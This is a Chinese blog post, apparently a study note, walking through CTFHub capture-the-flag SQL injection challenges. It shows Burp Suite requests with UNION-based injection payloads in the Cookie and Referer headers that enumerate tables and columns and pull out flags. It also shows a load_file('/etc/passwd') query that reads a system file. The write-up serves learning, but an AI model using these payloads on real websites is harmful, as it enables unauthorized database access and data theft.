CTFHUB

wlw_xx

已于 2022-09-11 07:19:10 修改

阅读量820

点赞数

分类专栏：学习笔记文章标签：数据库服务器 java

于 2022-09-07 19:40:51 首次发布

本文链接：https://blog.csdn.net/wlw_xx/article/details/126752072

版权

学习笔记专栏收录该内容

9 篇文章 0 订阅

订阅专栏

Cookie注入

工具：burp suite
这次的输入点变了。尝试找找Cookie吧
select * from news where id=1
ID: 1
Data: ctfhub

GET / HTTP/1.1
Host: challenge-01b55e9bf85f0710.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

Cookie: id=-1 union select version(),database();

hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1

在这里插入图片描述

GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database(); 
hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1

在这里插入图片描述

GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name="bnuisrgwep"; 
hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1

在这里插入图片描述

GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1, group_concat(mupbzaevry) from sqli.bnuisrgwep; 
hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1

在这里插入图片描述

MySQL结构

ID
select * from news where id=-1 union select version(),database()
ID: 10.3.22-MariaDB-0+deb10u1
Data: sqli

求库名

select * from news where id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'--

ID: 1
Data: ttrdbwiill,news

求表名

select * from news where id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name='ttrdbwiill'

求列名
ID: 1
Data: gdbhmtwwza

select * from news where id=-1 union select 1,group_concat(gdbhmtwwza )from sqli.ttrdbwiill

ID: 1
Data: ctfhub{c6039bafb52839c4e0fb47d9}

其他：

select * from news where id=-1 union select 1,group_concat(schema_name) from information_schema.schemata

ID: 1
Data: information_schema,mysql,performance_schema,sqli

select * from news where id=-2 union select 1,load_file('/etc/passwd')

ID: 1
Data: root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12👨/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt❌100:65534::/nonexistent:/usr/sbin/nologin mysql❌101:101:MySQL Server,:/nonexistent:/bin/false

Refer注入

求数据库名
请在referer输入ID
select * from news where id=-1 union select 1,database()
ID: 1
Data: sqli
求数据表
请在referer输入ID
select * from news where id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’
ID: 1
Data: news,nvtycnwnmh
求列名
请在referer输入ID
select * from news where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘nvtycnwnmh’
ID: 1
Data: xrfwvedani
找flag
请在referer输入ID
select * from news where id=-1 union select 1,group_concat(xrfwvedani) from nvtycnwnmh
ID: 1
Data: ctfhub{48eb7eee2b8ca6bae5fe6893}